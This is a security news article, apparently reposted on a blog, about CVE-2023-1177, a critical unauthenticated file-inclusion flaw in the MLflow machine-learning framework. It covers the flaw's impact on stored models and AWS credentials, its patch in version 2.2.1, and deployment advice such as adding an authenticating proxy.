Search This Blog

Powered by Blogger.

Blog Archive

Labels

A Major Flaw in the AI Testing Framework MLflow can Compromise the Server and Data

The vulnerability found by McInerney is tracked as CVE-2023-1177 and is rated 10 (critical) on the CVSS scale.
MLflow, an open-source framework used by many organizations to manage and record machine-learning tests, has been patched for a critical vulnerability that could enable attackers to extract sensitive information from servers such as SSH keys and AWS credentials. Since MLflow does not enforce authentication by default, and a growing percentage of MLflow deployments are directly exposed to the internet, the attacks can be carried out remotely without authentication.

"Basically, every organization that uses this tool is at risk of losing their AI models, having an internal server compromised, and having their AWS account compromised," Dan McInerney, a senior security engineer with cybersecurity startup Protect AI, told CSO. "It's pretty brutal."

McInerney discovered the flaw and privately reported it to the MLflow project. It was fixed in the framework's version 2.2.1, which was released three weeks ago, but no security fix was mentioned in the release notes.

Path traversal used to include local and remote files

MLflow is a Python-based tool for automating machine-learning workflows. It includes a number of components that enable users to deploy models from various ML libraries, handle their lifecycle (including model versioning, stage transitions, and annotations), track experiments to record and compare parameters and results, and even package ML code in a reproducible format to share with other data scientists. A REST API and command-line interface are available for controlling MLflow.

All of these features combine to make the framework an invaluable resource for any organisation experimenting with machine learning. Scans using the Shodan search engine confirm this, revealing a steady increase in publicly exposed MLflow instances over the last two years, with the current count exceeding 800.However, it is likely that many more MLflow deployments exist within internal networks and may be accessible to attackers who gain access to those networks.

"We reached out to our contacts at various Fortune 500's [and] they've all confirmed they're using MLflow internally for their AI engineering workflow,' McInerney tells CSO.

McInerney's vulnerability is identified as CVE-2023-1177 and is rated 10 (critical) on the CVSS scale. He refers to it as local and remote file inclusion (LFI/RFI) via the API, in which remote and unauthenticated attackers can send specially crafted requests to the API endpoint, forcing MLflow to expose the contents of any readable files on the server.

What makes the vulnerability worse is that most organisations configure their MLflow instances to store their models and other sensitive data in Amazon AWS S3. In accordance with a review of the configuration of publicly available MLflow instances by Protect AI, seven out of ten used AWS S3. This means that attackers can use the s3:/ URL of the bucket utilized by the instance as the source parameter in their JSON request to steal models remotely.

It also implies that AWS credentials are most likely stored locally on the MLflow server in order for the framework to access S3 buckets, and that these credentials are typically stored in a folder called /.aws/credentials under the user's home directory. The disclosure of AWS credentials can be a serious security breach because, depending on IAM policy, it can give attackers lateral movement capabilities into an organization's AWS infrastructure.

Insecure deployments result from a lack of default authentication

Authentication for accessing the API endpoint would protect this flaw from being exploited, but MLflow does not implement any authentication mechanism. Simple authentication with a static username and password can be added by placing a proxy server, such as nginx, in front of the MLflow server and forcing authentication through it. Unfortunately, almost none of the publicly exposed instances employ this configuration.

McInerney stated, "I can hardly call this a safe deployment of the tool, but at the very least, the safest deployment of MLflow as it stands currently is to keep it on an internal network, in a network segment that is partitioned away from all users except those who need to use it, and put behind an nginx proxy with basic authentication. This still doesn't prevent any user with access to the server from downloading other users' models and artifacts, but at the very least it limits the exposure. Exposing it on a public internet facing server assumes that absolutely nothing stored on the server or remote artifact store server contains sensitive data."
Share it:

AI

Cyber Safety

Data Safety

Machine learning

MLflow

Vulnerabilities and Exploits